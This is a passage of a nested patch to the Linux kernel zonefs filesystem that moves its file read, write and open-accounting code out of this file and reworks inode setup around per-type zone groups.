+-		iocb->ki_pos += size;
+-		return size;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Do not exceed the LFS limits nor the file zone size. If pos is under the
+- * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
+- */
+-static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
+-					loff_t count)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t limit = rlimit(RLIMIT_FSIZE);
+-	loff_t max_size = zi->i_max_size;
+-
+-	if (limit != RLIM_INFINITY) {
+-		if (pos >= limit) {
+-			send_sig(SIGXFSZ, current, 0);
+-			return -EFBIG;
+-		}
+-		count = min(count, limit - pos);
+-	}
+-
+-	if (!(file->f_flags & O_LARGEFILE))
+-		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
+-
+-	if (unlikely(pos >= max_size))
+-		return -EFBIG;
+-
+-	return min(count, max_size - pos);
+-}
+-
+-static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t count;
+-
+-	if (IS_SWAPFILE(inode))
+-		return -ETXTBSY;
+-
+-	if (!iov_iter_count(from))
+-		return 0;
+-
+-	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
+-		return -EINVAL;
+-
+-	if (iocb->ki_flags & IOCB_APPEND) {
+-		if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-			return -EINVAL;
+-		mutex_lock(&zi->i_truncate_mutex);
+-		iocb->ki_pos = zi->i_wpoffset;
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	count = zonefs_write_check_limits(file, iocb->ki_pos,
+-					  iov_iter_count(from));
+-	if (count < 0)
+-		return count;
+-
+-	iov_iter_truncate(from, count);
+-	return iov_iter_count(from);
+-}
+-
+-/*
+- * Handle direct writes. For sequential zone files, this is the only possible
+- * write path. For these files, check that the user is issuing writes
+- * sequentially from the end of the file. This code assumes that the block layer
+- * delivers write requests to the device in sequential order. This is always the
+- * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
+- * elevator feature is being used (e.g. mq-deadline). The block layer always
+- * automatically select such an elevator for zoned block devices during the
+- * device initialization.
+- */
+-static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	bool sync = is_sync_kiocb(iocb);
+-	bool append = false;
+-	ssize_t ret, count;
+-
+-	/*
+-	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
+-	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
+-	 * on the inode lock but the second goes through but is now unaligned).
+-	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && !sync &&
+-	    (iocb->ki_flags & IOCB_NOWAIT))
+-		return -EOPNOTSUPP;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	count = zonefs_write_checks(iocb, from);
+-	if (count <= 0) {
+-		ret = count;
+-		goto inode_unlock;
+-	}
+-
+-	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-		ret = -EINVAL;
+-		goto inode_unlock;
+-	}
+-
+-	/* Enforce sequential writes (append only) in sequential zones */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ) {
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (iocb->ki_pos != zi->i_wpoffset) {
+-			mutex_unlock(&zi->i_truncate_mutex);
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		append = sync;
+-	}
+-
+-	if (append)
+-		ret = zonefs_file_dio_append(iocb, from);
+-	else
+-		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
+-				   &zonefs_write_dio_ops, 0, NULL, 0);
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (ret > 0 || ret == -EIOCBQUEUED)) {
+-		if (ret > 0)
+-			count = ret;
+-
+-		/*
+-		 * Update the zone write pointer offset assuming the write
+-		 * operation succeeded. If it did not, the error recovery path
+-		 * will correct it. Also do active seq file accounting.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		zi->i_wpoffset += count;
+-		zonefs_account_active(inode);
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
+-					  struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	ssize_t ret;
+-
+-	/*
+-	 * Direct IO writes are mandatory for sequential zone files so that the
+-	 * write IO issuing order is preserved.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV)
+-		return -EIO;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	ret = zonefs_write_checks(iocb, from);
+-	if (ret <= 0)
+-		goto inode_unlock;
+-
+-	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
+-	if (ret > 0)
+-		iocb->ki_pos += ret;
+-	else if (ret == -EIO)
+-		zonefs_io_error(inode, true);
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-	if (ret > 0)
+-		ret = generic_write_sync(iocb, ret);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	if (sb_rdonly(inode->i_sb))
+-		return -EROFS;
+-
+-	/* Write operations beyond the zone size are not allowed */
+-	if (iocb->ki_pos >= ZONEFS_I(inode)->i_max_size)
+-		return -EFBIG;
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		ssize_t ret = zonefs_file_dio_write(iocb, from);
+-		if (ret != -ENOTBLK)
+-			return ret;
+-	}
+-
+-	return zonefs_file_buffered_write(iocb, from);
+-}
+-
+-static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
+-				       int error, unsigned int flags)
+-{
+-	if (error) {
+-		zonefs_io_error(file_inode(iocb->ki_filp), false);
+-		return error;
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_read_dio_ops = {
+-	.end_io			= zonefs_file_read_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-	ssize_t ret;
+-
+-	/* Offline zones cannot be read */
+-	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
+-		return -EPERM;
+-
+-	if (iocb->ki_pos >= zi->i_max_size)
+-		return 0;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock_shared(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock_shared(inode);
+-	}
+-
+-	/* Limit read operations to written data */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	isize = i_size_read(inode);
+-	if (iocb->ki_pos >= isize) {
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		ret = 0;
+-		goto inode_unlock;
+-	}
+-	iov_iter_truncate(to, isize - iocb->ki_pos);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		size_t count = iov_iter_count(to);
+-
+-		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		file_accessed(iocb->ki_filp);
+-		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
+-				   &zonefs_read_dio_ops, 0, NULL, 0);
+-	} else {
+-		ret = generic_file_read_iter(iocb, to);
+-		if (ret == -EIO)
+-			zonefs_io_error(inode, false);
+-	}
+-
+-inode_unlock:
+-	inode_unlock_shared(inode);
+-
+-	return ret;
+-}
+-
+-/*
+- * Write open accounting is done only for sequential files.
+- */
+-static inline bool zonefs_seq_file_need_wro(struct inode *inode,
+-					    struct file *file)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return false;
+-
+-	if (!(file->f_mode & FMODE_WRITE))
+-		return false;
+-
+-	return true;
+-}
+-
+-static int zonefs_seq_file_write_open(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	if (!zi->i_wr_refcnt) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
+-
+-		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
+-
+-			if (sbi->s_max_wro_seq_files
+-			    && wro > sbi->s_max_wro_seq_files) {
+-				atomic_dec(&sbi->s_wro_seq_files);
+-				ret = -EBUSY;
+-				goto unlock;
+-			}
+-
+-			if (i_size_read(inode) < zi->i_max_size) {
+-				ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-				if (ret) {
+-					atomic_dec(&sbi->s_wro_seq_files);
+-					goto unlock;
+-				}
+-				zi->i_flags |= ZONEFS_ZONE_OPEN;
+-				zonefs_account_active(inode);
+-			}
+-		}
+-	}
+-
+-	zi->i_wr_refcnt++;
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
+-}
+-
+-static int zonefs_file_open(struct inode *inode, struct file *file)
+-{
+-	int ret;
+-
+-	ret = generic_file_open(inode, file);
+-	if (ret)
+-		return ret;
+-
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		return zonefs_seq_file_write_open(inode);
+-
+-	return 0;
+-}
+-
+-static void zonefs_seq_file_write_close(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	zi->i_wr_refcnt--;
+-	if (zi->i_wr_refcnt)
+-		goto unlock;
+-
+-	/*
+-	 * The file zone may not be open anymore (e.g. the file was truncated to
+-	 * its maximum size or it was fully written). For this case, we only
+-	 * need to decrement the write open count.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret) {
+-			__zonefs_io_error(inode, false);
+-			/*
+-			 * Leaving zones explicitly open may lead to a state
+-			 * where most zones cannot be written (zone resources
+-			 * exhausted). So take preventive action by remounting
+-			 * read-only.
+-			 */
+-			if (zi->i_flags & ZONEFS_ZONE_OPEN &&
+-			    !(sb->s_flags & SB_RDONLY)) {
+-				zonefs_warn(sb,
+-					"closing zone at %llu failed %d\n",
+-					zi->i_zsector, ret);
+-				zonefs_warn(sb,
+-					"remounting filesystem read-only\n");
+-				sb->s_flags |= SB_RDONLY;
+-			}
+-			goto unlock;
+-		}
+-
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-		zonefs_account_active(inode);
+-	}
+-
+-	atomic_dec(&sbi->s_wro_seq_files);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_release(struct inode *inode, struct file *file)
+-{
+-	/*
+-	 * If we explicitly open a zone we must close it again as well, but the
+-	 * zone management operation can fail (either due to an IO error or as
+-	 * the zone has gone offline or read-only). Make sure we don't fail the
+-	 * close(2) for user-space.
+-	 */
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		zonefs_seq_file_write_close(inode);
+-
+-	return 0;
+-}
+-
+-static const struct file_operations zonefs_file_operations = {
+-	.open		= zonefs_file_open,
+-	.release	= zonefs_file_release,
+-	.fsync		= zonefs_file_fsync,
+-	.mmap		= zonefs_file_mmap,
+-	.llseek		= zonefs_file_llseek,
+-	.read_iter	= zonefs_file_read_iter,
+-	.write_iter	= zonefs_file_write_iter,
+-	.splice_read	= generic_file_splice_read,
+-	.splice_write	= iter_file_splice_write,
+-	.iopoll		= iocb_bio_iopoll,
+-};
+-
+ static struct kmem_cache *zonefs_inode_cachep;
+ 
+ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+@@ -1282,7 +414,6 @@ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+ 	inode_init_once(&zi->i_vnode);
+ 	mutex_init(&zi->i_truncate_mutex);
+ 	zi->i_wr_refcnt = 0;
+-	zi->i_flags = 0;
+ 
+ 	return &zi->i_vnode;
+ }
+@@ -1315,8 +446,8 @@ static int zonefs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 	buf->f_bavail = buf->f_bfree;
+ 
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		if (sbi->s_nr_files[t])
+-			buf->f_files += sbi->s_nr_files[t] + 1;
++		if (sbi->s_zgroup[t].g_nr_zones)
++			buf->f_files += sbi->s_zgroup[t].g_nr_zones + 1;
+ 	}
+ 	buf->f_ffree = 0;
+ 
+@@ -1382,51 +513,85 @@ static int zonefs_parse_options(struct super_block *sb, char *options)
+ 		}
+ 	}
+ 
+-	return 0;
+-}
++	return 0;
++}
++
++static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
++		seq_puts(seq, ",errors=remount-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
++		seq_puts(seq, ",errors=zone-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
++		seq_puts(seq, ",errors=zone-offline");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
++		seq_puts(seq, ",errors=repair");
++
++	return 0;
++}
++
++static int zonefs_remount(struct super_block *sb, int *flags, char *data)
++{
++	sync_filesystem(sb);
++
++	return zonefs_parse_options(sb, data);
++}
++
++static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
++				struct dentry *dentry, struct iattr *iattr)
++{
++	struct inode *inode = d_inode(dentry);
++	int ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	ret = setattr_prepare(&init_user_ns, dentry, iattr);
++	if (ret)
++		return ret;
++
++	/*
++	 * Since files and directories cannot be created nor deleted, do not
++	 * allow setting any write attributes on the sub-directories grouping
++	 * files by zone type.
++	 */
++	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
++	    (iattr->ia_mode & 0222))
++		return -EPERM;
++
++	if (((iattr->ia_valid & ATTR_UID) &&
++	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
++	    ((iattr->ia_valid & ATTR_GID) &&
++	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
++		ret = dquot_transfer(mnt_userns, inode, iattr);
++		if (ret)
++			return ret;
++	}
+ 
+-static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
+-{
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++	if (iattr->ia_valid & ATTR_SIZE) {
++		ret = zonefs_file_truncate(inode, iattr->ia_size);
++		if (ret)
++			return ret;
++	}
+ 
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
+-		seq_puts(seq, ",errors=remount-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
+-		seq_puts(seq, ",errors=zone-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
+-		seq_puts(seq, ",errors=zone-offline");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
+-		seq_puts(seq, ",errors=repair");
++	setattr_copy(&init_user_ns, inode, iattr);
+ 
+ 	return 0;
+ }
+ 
+-static int zonefs_remount(struct super_block *sb, int *flags, char *data)
+-{
+-	sync_filesystem(sb);
+-
+-	return zonefs_parse_options(sb, data);
+-}
+-
+-static const struct super_operations zonefs_sops = {
+-	.alloc_inode	= zonefs_alloc_inode,
+-	.free_inode	= zonefs_free_inode,
+-	.statfs		= zonefs_statfs,
+-	.remount_fs	= zonefs_remount,
+-	.show_options	= zonefs_show_options,
+-};
+-
+ static const struct inode_operations zonefs_dir_inode_operations = {
+ 	.lookup		= simple_lookup,
+ 	.setattr	= zonefs_inode_setattr,
+ };
+ 
+ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+-				  enum zonefs_ztype type)
++				  enum zonefs_ztype ztype)
+ {
+ 	struct super_block *sb = parent->i_sb;
+ 
+-	inode->i_ino = bdev_nr_zones(sb->s_bdev) + type + 1;
++	inode->i_ino = bdev_nr_zones(sb->s_bdev) + ztype + 1;
+ 	inode_init_owner(&init_user_ns, inode, parent, S_IFDIR | 0555);
+ 	inode->i_op = &zonefs_dir_inode_operations;
+ 	inode->i_fop = &simple_dir_operations;
+@@ -1434,73 +599,38 @@ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+ 	inc_nlink(parent);
+ }
+ 
+-static int zonefs_init_file_inode(struct inode *inode, struct blk_zone *zone,
+-				  enum zonefs_ztype type)
++static const struct inode_operations zonefs_file_inode_operations = {
++	.setattr	= zonefs_inode_setattr,
++};
++
++static void zonefs_init_file_inode(struct inode *inode,
++				   struct zonefs_zone *z)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	inode->i_ino = zone->start >> sbi->s_zone_sectors_shift;
+-	inode->i_mode = S_IFREG | sbi->s_perm;
+-
+-	zi->i_ztype = type;
+-	zi->i_zsector = zone->start;
+-	zi->i_zone_size = zone->len << SECTOR_SHIFT;
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
+-	    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-		zonefs_err(sb,
+-			   "zone size %llu doesn't match device's zone sectors %llu\n",
+-			   zi->i_zone_size,
+-			   bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
+-		return -EINVAL;
+-	}
+ 
+-	zi->i_max_size = min_t(loff_t, MAX_LFS_FILESIZE,
+-			       zone->capacity << SECTOR_SHIFT);
+-	zi->i_wpoffset = zonefs_check_zone_condition(inode, zone, true, true);
++	inode->i_private = z;
+ 
++	inode->i_ino = z->z_sector >> sbi->s_zone_sectors_shift;
++	inode->i_mode = S_IFREG | sbi->s_perm;
+ 	inode->i_uid = sbi->s_uid;
+ 	inode->i_gid = sbi->s_gid;
+-	inode->i_size = zi->i_wpoffset;
+-	inode->i_blocks = zi->i_max_size >> SECTOR_SHIFT;
++	inode->i_size = z->z_wpoffset;
++	inode->i_blocks = z->z_capacity >> SECTOR_SHIFT;
+ 
+ 	inode->i_op = &zonefs_file_inode_operations;
+ 	inode->i_fop = &zonefs_file_operations;
+ 	inode->i_mapping->a_ops = &zonefs_file_aops;
+ 
+-	sb->s_maxbytes = max(zi->i_max_size, sb->s_maxbytes);
+-	sbi->s_blocks += zi->i_max_size >> sb->s_blocksize_bits;
+-	sbi->s_used_blocks += zi->i_wpoffset >> sb->s_blocksize_bits;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	/*
+-	 * For sequential zones, make sure that any open zone is closed first
+-	 * to ensure that the initial number of open zones is 0, in sync with
+-	 * the open zone accounting done when the mount option
+-	 * ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
+-	 */
+-	if (type == ZONEFS_ZTYPE_SEQ &&
+-	    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
+-	     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret)
+-			goto unlock;
+-	}
+-
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
++	/* Update the inode access rights depending on the zone condition */
++	z->z_flags |= ZONEFS_ZONE_INIT_MODE;
++	zonefs_inode_update_mode(inode);
+ }
+ 
+ static struct dentry *zonefs_create_inode(struct dentry *parent,
+-					const char *name, struct blk_zone *zone,
+-					enum zonefs_ztype type)
++					  const char *name,
++					  struct zonefs_zone *z,
++					  enum zonefs_ztype ztype)
+ {
+ 	struct inode *dir = d_inode(parent);
+ 	struct dentry *dentry;
+@@ -1516,15 +646,10 @@ static struct dentry *zonefs_create_inode(struct dentry *parent,
+ 		goto dput;
+ 
+ 	inode->i_ctime = inode->i_mtime = inode->i_atime = dir->i_ctime;
+-	if (zone) {
+-		ret = zonefs_init_file_inode(inode, zone, type);
+-		if (ret) {
+-			iput(inode);
+-			goto dput;
+-		}
+-	} else {
+-		zonefs_init_dir_inode(dir, inode, type);
+-	}
++	if (z)
++		zonefs_init_file_inode(inode, z);
++	else
++		zonefs_init_dir_inode(dir, inode, ztype);
+ 
+ 	d_add(dentry, inode);
+ 	dir->i_size++;
+@@ -1540,100 +665,51 @@ dput:
+ struct zonefs_zone_data {
+ 	struct super_block	*sb;
+ 	unsigned int		nr_zones[ZONEFS_ZTYPE_MAX];
++	sector_t		cnv_zone_start;
+ 	struct blk_zone		*zones;
+ };
+ 
+ /*
+- * Create a zone group and populate it with zone files.
++ * Create the inodes for a zone group.
+  */
+-static int zonefs_create_zgroup(struct zonefs_zone_data *zd,
+-				enum zonefs_ztype type)
++static int zonefs_create_zgroup_inodes(struct super_block *sb,
++				       enum zonefs_ztype ztype)
+ {
+-	struct super_block *sb = zd->sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct blk_zone *zone, *next, *end;
+-	const char *zgroup_name;
+-	char *file_name;
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
+ 	struct dentry *dir, *dent;
+-	unsigned int n = 0;
+-	int ret;
++	char *file_name;
++	int i, ret = 0;
++
++	if (!zgroup)
++		return -ENOMEM;
+ 
+ 	/* If the group is empty, there is nothing to do */
+-	if (!zd->nr_zones[type])
++	if (!zgroup->g_nr_zones)
+ 		return 0;
+ 
+ 	file_name = kmalloc(ZONEFS_NAME_MAX, GFP_KERNEL);
+ 	if (!file_name)
+ 		return -ENOMEM;
+ 
+-	if (type == ZONEFS_ZTYPE_CNV)
+-		zgroup_name = "cnv";
+-	else
+-		zgroup_name = "seq";
+-
+-	dir = zonefs_create_inode(sb->s_root, zgroup_name, NULL, type);
++	dir = zonefs_create_inode(sb->s_root, zonefs_zgroup_name(ztype),
++				  NULL, ztype);
+ 	if (IS_ERR(dir)) {
+ 		ret = PTR_ERR(dir);
+ 		goto free;
+ 	}
+ 
+-	/*
+-	 * The first zone contains the super block: skip it.
+-	 */
+-	end = zd->zones + bdev_nr_zones(sb->s_bdev);
+-	for (zone = &zd->zones[1]; zone < end; zone = next) {
+-
+-		next = zone + 1;
+-		if (zonefs_zone_type(zone) != type)
+-			continue;
+-
+-		/*
+-		 * For conventional zones, contiguous zones can be aggregated
+-		 * together to form larger files. Note that this overwrites the
+-		 * length of the first zone of the set of contiguous zones
+-		 * aggregated together. If one offline or read-only zone is
+-		 * found, assume that all zones aggregated have the same
+-		 * condition.
+-		 */
+-		if (type == ZONEFS_ZTYPE_CNV &&
+-		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-			for (; next < end; next++) {
+-				if (zonefs_zone_type(next) != type)
+-					break;
+-				zone->len += next->len;
+-				zone->capacity += next->capacity;
+-				if (next->cond == BLK_ZONE_COND_READONLY &&
+-				    zone->cond != BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_READONLY;
+-				else if (next->cond == BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_OFFLINE;
+-			}
+-			if (zone->capacity != zone->len) {
+-				zonefs_err(sb, "Invalid conventional zone capacity\n");
+-				ret = -EINVAL;
+-				goto free;
+-			}
+-		}
+-
+-		/*
+-		 * Use the file number within its group as file name.
+-		 */
+-		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", n);
+-		dent = zonefs_create_inode(dir, file_name, zone, type);
++	for (i = 0; i < zgroup->g_nr_zones; i++) {
++		/* Use the zone number within its group as the file name */
++		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", i);
++		dent = zonefs_create_inode(dir, file_name,
++					   &zgroup->g_zones[i], ztype);
+ 		if (IS_ERR(dent)) {
+ 			ret = PTR_ERR(dent);
+-			goto free;
++			break;
+ 		}
+-
+-		n++;
+ 	}
+ 
+-	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
+-		    zgroup_name, n, n > 1 ? "s" : "");
+-
+-	sbi->s_nr_files[type] = n;
+-	ret = 0;
+-
+ free:
+ 	kfree(file_name);
+ 
+@@ -1644,21 +720,38 @@ static int zonefs_get_zone_info_cb(struct blk_zone *zone, unsigned int idx,
+ 				   void *data)
+ {
+ 	struct zonefs_zone_data *zd = data;
++	struct super_block *sb = zd->sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++
++	/*
++	 * We do not care about the first zone: it contains the super block
++	 * and not exposed as a file.
++	 */
++	if (!idx)
++		return 0;
+ 
+ 	/*
+-	 * Count the number of usable zones: the first zone at index 0 contains
+-	 * the super block and is ignored.
++	 * Count the number of zones that will be exposed as files.
++	 * For sequential zones, we always have as many files as zones.
++	 * FOr conventional zones, the number of files depends on if we have
++	 * conventional zones aggregation enabled.
+ 	 */
+ 	switch (zone->type) {
+ 	case BLK_ZONE_TYPE_CONVENTIONAL:
+-		zone->wp = zone->start + zone->len;
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_CNV]++;
++		if (sbi->s_features & ZONEFS_F_AGGRCNV) {
++			/* One file per set of contiguous conventional zones */
++			if (!(sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones) ||
++			    zone->start != zd->cnv_zone_start)
++				sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++			zd->cnv_zone_start = zone->start + zone->len;
++		} else {
++			/* One file per zone */
++			sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++		}
+ 		break;
+ 	case BLK_ZONE_TYPE_SEQWRITE_REQ:
+ 	case BLK_ZONE_TYPE_SEQWRITE_PREF:
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_SEQ]++;
++		sbi->s_zgroup[ZONEFS_ZTYPE_SEQ].g_nr_zones++;
+ 		break;
+ 	default:
+ 		zonefs_err(zd->sb, "Unsupported zone type 0x%x\n",
+@@ -1698,11 +791,173 @@ static int zonefs_get_zone_info(struct zonefs_zone_data *zd)
+ 	return 0;
+ }
+ 
+-static inline void zonefs_cleanup_zone_info(struct zonefs_zone_data *zd)
++static inline void zonefs_free_zone_info(struct zonefs_zone_data *zd)
+ {
+ 	kvfree(zd->zones);
+ }
+ 
++/*
++ * Create a zone group and populate it with zone files.
++ */
++static int zonefs_init_zgroup(struct super_block *sb,
++			      struct zonefs_zone_data *zd,
++			      enum zonefs_ztype ztype)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
++	struct blk_zone *zone, *next, *end;
++	struct zonefs_zone *z;
++	unsigned int n = 0;
++	int ret;
++
++	/* Allocate the zone group. If it is empty, we have nothing to do. */
++	if (!zgroup->g_nr_zones)
++		return 0;
++
++	zgroup->g_zones = kvcalloc(zgroup->g_nr_zones,
++				   sizeof(struct zonefs_zone), GFP_KERNEL);
++	if (!zgroup->g_zones)
++		return -ENOMEM;
++
++	/*
++	 * Initialize the zone groups using the device zone information.
++	 * We always skip the first zone as it contains the super block
++	 * and is not use to back a file.
++	 */
++	end = zd->zones + bdev_nr_zones(sb->s_bdev);
++	for (zone = &zd->zones[1]; zone < end; zone = next) {
++
++		next = zone + 1;
++		if (zonefs_zone_type(zone) != ztype)
++			continue;
++
++		if (WARN_ON_ONCE(n >= zgroup->g_nr_zones))
++			return -EINVAL;
++
++		/*
++		 * For conventional zones, contiguous zones can be aggregated
++		 * together to form larger files. Note that this overwrites the
++		 * length of the first zone of the set of contiguous zones
++		 * aggregated together. If one offline or read-only zone is
++		 * found, assume that all zones aggregated have the same
++		 * condition.
++		 */
++		if (ztype == ZONEFS_ZTYPE_CNV &&
++		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			for (; next < end; next++) {
++				if (zonefs_zone_type(next) != ztype)
++					break;
++				zone->len += next->len;
++				zone->capacity += next->capacity;
++				if (next->cond == BLK_ZONE_COND_READONLY &&
++				    zone->cond != BLK_ZONE_COND_OFFLINE)
